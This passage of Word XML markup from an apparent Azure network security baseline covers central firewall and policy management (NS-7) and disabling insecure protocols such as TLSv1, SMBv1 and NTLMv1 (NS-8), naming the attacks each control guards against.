          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fine-tune signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3A55A" w14:textId="3AFBDA58" w:rsidR="00E81F50" w:rsidRDefault="00E81F50" w:rsidP="00E81F50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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1072B1" w:rsidRDefault="002D40EA" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc236841629"/>
      <w:r w:rsidRPr="001072B1">
        <w:t>NS-7: Manage network security centrally and effectively</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="60F039CF" w14:textId="5DEA8857" w:rsidR="00EB7E1B" w:rsidRDefault="00EB7E1B" w:rsidP="00EB7E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183AF715" w14:textId="00E334ED" w:rsidR="004B575E" w:rsidRDefault="004B575E" w:rsidP="004B575E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Default="004B575E" w:rsidP="004B575E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidRPr="004B575E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD54F2A" w14:textId="584B21C8" w:rsidR="004B575E" w:rsidRDefault="004B575E" w:rsidP="004B575E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inconsistent policy enforcement and misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFD630" w14:textId="37E8A996" w:rsidR="004B575E" w:rsidRDefault="004B575E" w:rsidP="004B575E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Decentralized management often leads to fragmented rule sets and policy gaps, making it easier for attackers to discover and exploit weak points. Misconfigurations are more likely, increasing the chances of accidental exposure or unintended access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4596CFD8" w14:textId="7D888527" w:rsidR="008B0A05" w:rsidRDefault="008B0A05" w:rsidP="008B0A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0A05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reduced visibility and delayed response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364C7AC" w14:textId="0A361AEE" w:rsidR="008B0A05" w:rsidRDefault="008B0A05" w:rsidP="008B0A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0A05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inadequate central management complicates efforts to consistently meet regulatory and industry standards, risking non-compliance and potential penalties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A27290" w14:textId="2F88F890" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="005A7037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7037">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0832E9E5" w14:textId="75FB5BC5" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="005A7037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7037">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317D8FC" w14:textId="48E35D39" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="005A7037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7037">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D21B30" w14:textId="2AF9ADC0" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="005A7037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7037">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C396F0E" w14:textId="4D904AC7" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="005A7037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7037">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9434AC" w14:textId="5219EED5" w:rsidR="00642845" w:rsidRDefault="00642845" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00642845">
        <w:t>NS-7.1: Manage network security centrally and effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE16AA0" w14:textId="5B653453" w:rsidR="004F2A66" w:rsidRDefault="004F2A66" w:rsidP="004F2A66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2A66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure's centralized tools and standardized practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9EBD96" w14:textId="1486E96F" w:rsidR="004F2A66" w:rsidRDefault="004F2A66" w:rsidP="004F2A66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2A66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement centralized policy enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707D417B" w14:textId="3F48144E" w:rsidR="004F2A66" w:rsidRDefault="004F2A66" w:rsidP="004F2A66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2A66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure Virtual Network Manager (AVNM) to define Security Admin Rules that apply consistently across subscriptions and regions. Retain NSGs for workload-level micro-segmentation. Apply policies through network groups (e.g., by environment: prod, non-prod).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE14E2" w14:textId="77777777" w:rsidR="00CB27F3" w:rsidRDefault="00CB27F3" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC8D94A" w14:textId="3E60B89E" w:rsidR="00FC4756" w:rsidRDefault="00FC4756" w:rsidP="00FC4756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4756">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Standardize firewall and routing management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F75DD3" w14:textId="337A4F47" w:rsidR="00FC4756" w:rsidRDefault="00FC4756" w:rsidP="00FC4756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4756">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Manage Azure Firewall rules through Firewall Manager with Firewall Policy objects. Standardize on IP Groups and Service Tags instead of raw IPs. Use Azure Firewall Premium where TLS inspection, IDPS, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4756">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>URL filtering are required. Prefer Virtual WAN secure hubs or a shared hub-and-spoke topology to enforce routing intent consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5A374" w14:textId="47D102C7" w:rsidR="00237747" w:rsidRDefault="00237747" w:rsidP="00237747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237747">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable comprehensive monitoring and analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05B6AC" w14:textId="0A2F83E6" w:rsidR="00237747" w:rsidRDefault="00237747" w:rsidP="00237747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237747">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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48D796F9" w:rsidR="00A226F7" w:rsidRDefault="00A226F7" w:rsidP="00A226F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A226F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maintain resource consistency and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CE108" w14:textId="7C9660D4" w:rsidR="00A226F7" w:rsidRDefault="00A226F7" w:rsidP="00A226F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A226F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apply CAF naming conventions and mandatory resource tags to all VNets, NSGs, firewall rules, and groups. Use Defender for Cloud's Adaptive Network Hardening to refine over-permissive rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195BD084" w14:textId="31C4CF47" w:rsidR="005B77F3" w:rsidRPr="001072B1" w:rsidRDefault="005B77F3" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc236841630"/>
      <w:r w:rsidRPr="001072B1">
        <w:t>NS-8: Detect and disable insecure services and protocols</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0583E4DC" w14:textId="7EBC6F65" w:rsidR="002A6886" w:rsidRDefault="002A6886" w:rsidP="002A6886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6886">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229480AF" w14:textId="41735121" w:rsidR="002A6886" w:rsidRDefault="002A6886" w:rsidP="002A6886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6886">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discover and disable insecure services and protocols at the OS, application, or software package layer. Deploy compensating controls if disabling insecure services and protocols is not possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B6F27" w14:textId="1639C483" w:rsidR="002A6886" w:rsidRDefault="002A6886" w:rsidP="002A6886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6886">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00134E62" w:rsidRPr="002A6886">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3F04D" w14:textId="5C777B92" w:rsidR="002A6886" w:rsidRDefault="00134E62" w:rsidP="002A6886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cryptographic Weakness Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879F862" w14:textId="1BF3F2F2" w:rsidR="00BE522A" w:rsidRPr="00CB27F3" w:rsidRDefault="00134E62" w:rsidP="00BE522A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB27F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSL/TLSv1 and weak ciphers (e.g., RC4, DES) are vulnerable to MITM attacks (e.g., POODLE, BEAST), enabling adversaries to decrypt sensitive data like session tokens via padding oracle or chosen-ciphertext attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181756B" w14:textId="690B75C5" w:rsidR="00BE522A" w:rsidRDefault="00BE522A" w:rsidP="00BE522A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE522A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized Access via Protocol Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE93135" w14:textId="34AA12CF" w:rsidR="00BE522A" w:rsidRDefault="00BE522A" w:rsidP="00BE522A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE522A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSHv1 and SMBv1 vulnerabilities (e.g., CVE-2001-1473, CVE-2017-0144/EternalBlue) allow remote code execution or unauthenticated access, enabling initial footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFA4DB" w14:textId="497FD51F" w:rsidR="000D3BE5" w:rsidRDefault="000D3BE5" w:rsidP="000D3BE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3BE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Credential Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA5015" w14:textId="396F3335" w:rsidR="000D3BE5" w:rsidRDefault="000D3BE5" w:rsidP="000D3BE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3BE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LM/NTLMv1 and wDigest store weak hashes or plaintext credentials, vulnerable to pass-the-hash or memory scraping (e.g., Mimikatz extracting LSASS data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D234677" w14:textId="526B9AD7" w:rsidR="00B67506" w:rsidRDefault="00B67506" w:rsidP="00B67506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B67506">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FD794" w14:textId="5E356D39" w:rsidR="00B67506" w:rsidRDefault="00B67506" w:rsidP="00B67506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
